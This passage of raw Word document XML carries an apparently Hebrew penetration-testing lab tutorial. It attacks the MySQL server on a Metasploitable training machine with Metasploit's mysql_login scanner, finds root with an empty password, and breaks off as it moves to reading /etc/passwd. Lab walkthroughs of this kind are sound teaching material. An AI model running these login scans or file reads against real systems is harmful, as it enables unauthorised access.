      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נוכל בדוק באיזו הרשאה אנחנו התחברנו</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFD69AD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כמו שניתן לראות המשתמש הוגדר כ </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CC0743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2FE55770" wp14:editId="0C583EBB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6073140" cy="4172835"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="70" name="תמונה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1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F6104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4B79C1D3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190DA0A9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6B3F26" wp14:editId="1D626145">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>624840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>21590</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1965960" cy="243840"/>
                <wp:effectExtent l="19050" t="19050" r="15240" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="89" name="מלב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4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98605" id="מלבן 89" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:49.2pt;margin-top:1.7pt;width:154.8pt;height:19.2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" filled="f" strokecolor="yellow" strokeweight="3pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD9212D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36DA9483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7A804545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25EE668C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45E0D3B6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5D26D890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364EF849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0E97D88C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725B2608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2DCF036F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79C37CFB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5B9EAA35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70F4AB5C" w14:textId="1AB62CF8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 כמו שניתן לראות </w:t>
      </w:r>
      <w:r w:rsidR="000607CB" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">השם 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משתמש </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755EEF24" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560928B2" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF70C92" w14:textId="39AA3A8B" w:rsidR="00195D38" w:rsidRPr="007D51BF" w:rsidRDefault="00195D38" w:rsidP="00195D38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08837484" w14:textId="77777777" w:rsidR="00391A9E" w:rsidRPr="007D51BF" w:rsidRDefault="00391A9E" w:rsidP="00391A9E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7D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3306/</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  MySQL 5.0.51a-3ubuntu5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040188D4" w14:textId="6376629D" w:rsidR="00654EEA" w:rsidRPr="007D51BF" w:rsidRDefault="00391A9E" w:rsidP="008E32B3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בחלק הבא נבצע מספר התקפות על שרת ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sql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המותקן במכונה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>metasplotable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB20729" w14:textId="1A2DA683" w:rsidR="00391A9E" w:rsidRPr="007D51BF" w:rsidRDefault="00391A9E" w:rsidP="008E32B3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מחשיפת הסיסמא של השרת ועד כניסה לשרת וביצוע פעולות.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64599EA5" w14:textId="50E79C11" w:rsidR="00391A9E" w:rsidRPr="007D51BF" w:rsidRDefault="00391A9E" w:rsidP="008E32B3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נתחיל </w:t>
      </w:r>
      <w:r w:rsidR="00B21E58" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">בחיפוש אחר המודול הרצוי עם הפקודה </w:t>
      </w:r>
      <w:r w:rsidR="00B21E58" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>search mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509F4B5F" w14:textId="605B12FD" w:rsidR="00654EEA" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3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781D51F3" wp14:editId="20F4537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644640" cy="3154680"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:wrapNone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4495F" w14:textId="58320698" w:rsidR="002F19A7" w:rsidRPr="007D51BF" w:rsidRDefault="002F19A7" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1233C851" w14:textId="67988FC2" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62CFF87D" w14:textId="5F7CCCA4" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C3ABBC" w14:textId="5AA0244F" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C9DE2CF" w14:textId="6012FF8E" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E2DB0D" w14:textId="40FA7437" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63492A6F" w14:textId="08EDD6F8" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="275C9820" w14:textId="2644C7A9" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37AC7589" w14:textId="6E25EC1F" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FE05BEB" w14:textId="1D332D8D" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E8D0BF" w14:textId="6878A903" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77F8B825" w14:textId="742AEBC9" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3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ונחבר את מודל מספר 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA466C5" w14:textId="37BCA4E6" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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t>Auxiliary/scanner/mysql/mysql_login</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">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use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656944B1" w14:textId="7FEABCF8" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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0B119ADF" wp14:editId="6B606FB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639197" cy="815340"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
            <wp:wrapNone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197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1D4FC" w14:textId="3E9BFEDF" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77123B82" w14:textId="3F622AD9" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F0E5B17" w14:textId="080A060F" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B0EE8FD" w14:textId="4142562F" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3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עכשיו נריץ את הפקודה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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3106D3BC" w14:textId="53EAB3F8" w:rsidR="00ED3E78" w:rsidRPr="007D51BF" w:rsidRDefault="00ED3E78" w:rsidP="008E32B3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ונגדיר את כתובת ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D471CEA" w14:textId="5C65996A" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3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528E7567" wp14:editId="61E1AFD4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>96520</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6637020" cy="2346960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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C1863" w14:textId="77740A8B" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD1CFC2" w14:textId="619997E8" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3463A0B5" w14:textId="7EAF4BC1" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7559C083" w14:textId="37895082" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="710A1E2F" w14:textId="7D9AD9BC" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050DAEA5" w14:textId="77777777" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0E1AE9" w14:textId="77777777" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70EFB81E" w14:textId="77777777" w:rsidR="00B21E58" w:rsidRPr="007D51BF" w:rsidRDefault="00B21E58" w:rsidP="008E32B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="391A1110" w14:textId="182F4F9B" w:rsidR="00ED3E78" w:rsidRPr="007D51BF" w:rsidRDefault="00ED3E78" w:rsidP="00ED3E78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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32E460E8" wp14:editId="73854B5C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6530340" cy="769620"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A94D5A" w14:textId="4DF6AAB9" w:rsidR="00ED3E78" w:rsidRPr="007D51BF" w:rsidRDefault="00ED3E78" w:rsidP="00ED3E78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05E54438" w14:textId="27A49348" w:rsidR="00ED3E78" w:rsidRPr="007D51BF" w:rsidRDefault="00ED3E78" w:rsidP="00ED3E78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FB2E9E0" w14:textId="309908CA" w:rsidR="00ED3E78" w:rsidRPr="007D51BF" w:rsidRDefault="00ED3E78" w:rsidP="00ED3E78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C9E7EC0" w14:textId="77777777" w:rsidR="00ED3E78" w:rsidRPr="007D51BF" w:rsidRDefault="00ED3E78" w:rsidP="00ED3E78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שימו לב שהשם משתמש והסיסמא נמצאו </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE531E5" w14:textId="6A3EC6D4" w:rsidR="00ED3E78" w:rsidRPr="007D51BF" w:rsidRDefault="00ED3E78" w:rsidP="00ED3E78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במקרה הזה שם המשתמש</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: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</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB496B4" w14:textId="2816D372" w:rsidR="00ED3E78" w:rsidRPr="007D51BF" w:rsidRDefault="00B81228" w:rsidP="00ED3E78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0C6F493D" wp14:editId="29CC9257">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-114928</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>313055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6761473" cy="708660"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapNone/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13" cy="70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E78" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>סיסמא: (ריק)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBA8CF7" w14:textId="25BE9D53" w:rsidR="00B81228" w:rsidRPr="007D51BF" w:rsidRDefault="00B81228" w:rsidP="00ED3E78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA63878" w14:textId="2FD119BA" w:rsidR="00B81228" w:rsidRPr="007D51BF" w:rsidRDefault="00B81228" w:rsidP="00ED3E78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="700C39B0" w14:textId="77777777" w:rsidR="003B3972" w:rsidRPr="007D51BF" w:rsidRDefault="003B3972" w:rsidP="007B3A24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4233C3" w14:textId="4FF19018" w:rsidR="007B3A24" w:rsidRPr="007D51BF" w:rsidRDefault="00B81228" w:rsidP="007B3A24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מצאנו את השם והסיסמא אפשר לעבור לשלב הבא</w:t>
      </w:r>
      <w:r w:rsidR="007B3A24" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> וננסה למצוא את רשימת המשתמשי </w:t>
      </w:r>
      <w:r w:rsidR="003B3972" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ה</w:t>
      </w:r>
      <w:r w:rsidR="007B3A24" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>מערכת</w:t>
      </w:r>
      <w:r w:rsidR="003B3972" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בקובץ </w:t>
      </w:r>
      <w:r w:rsidR="003B3972" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="003B3972" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B3972" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B3972" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="003B3972" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>passwd</w:t>
